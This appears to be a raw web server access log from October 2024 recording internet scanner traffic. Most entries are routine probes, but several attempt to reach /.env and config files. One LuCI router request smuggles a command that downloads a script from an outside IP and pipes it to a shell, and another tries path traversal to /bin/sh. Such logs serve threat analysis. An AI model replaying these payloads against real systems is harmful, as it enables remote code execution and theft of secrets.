71.6.134.231 - - [04/Oct/2024:05:01:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
149.50.103.48 - - [04/Oct/2024:05:01:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [04/Oct/2024:05:04:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [04/Oct/2024:05:08:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
154.213.187.244 - - [04/Oct/2024:05:08:40 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
49.51.178.45 - - [04/Oct/2024:05:10:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.84.89.2 - - [04/Oct/2024:05:11:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/6.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Inspici (www.inspici.com)"
45.84.89.2 - - [04/Oct/2024:05:11:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/6.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Inspici (www.inspici.com)"
95.214.55.138 - - [04/Oct/2024:05:13:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.47 - - [04/Oct/2024:05:13:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
45.79.168.172 - - [04/Oct/2024:05:13:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.79.181.223 - - [04/Oct/2024:05:14:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.224.128.67 - - [04/Oct/2024:05:15:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
57.151.70.168 - - [04/Oct/2024:05:15:51 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
78.153.140.177 - - [04/Oct/2024:05:16:01 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.177 - - [04/Oct/2024:05:16:01 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 2.3.6; en-gb; GT-S5690 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.177 - - [04/Oct/2024:05:16:02 +0200] "GET /.config.yaml HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_3_5 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8L1 Safari/6533.18.5"
57.151.70.168 - - [04/Oct/2024:05:16:13 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
57.151.70.168 - - [04/Oct/2024:05:16:19 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
57.151.70.168 - - [04/Oct/2024:05:16:54 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
57.151.70.168 - - [04/Oct/2024:05:17:00 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
95.214.55.138 - - [04/Oct/2024:05:17:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.15 - - [04/Oct/2024:05:17:15 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
57.151.70.168 - - [04/Oct/2024:05:17:29 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
57.151.70.168 - - [04/Oct/2024:05:17:33 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
178.18.251.63 - - [04/Oct/2024:05:17:35 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
141.98.11.15 - - [04/Oct/2024:05:17:37 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
71.6.134.231 - - [04/Oct/2024:05:18:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
57.151.70.168 - - [04/Oct/2024:05:18:38 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
57.151.70.168 - - [04/Oct/2024:05:19:02 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
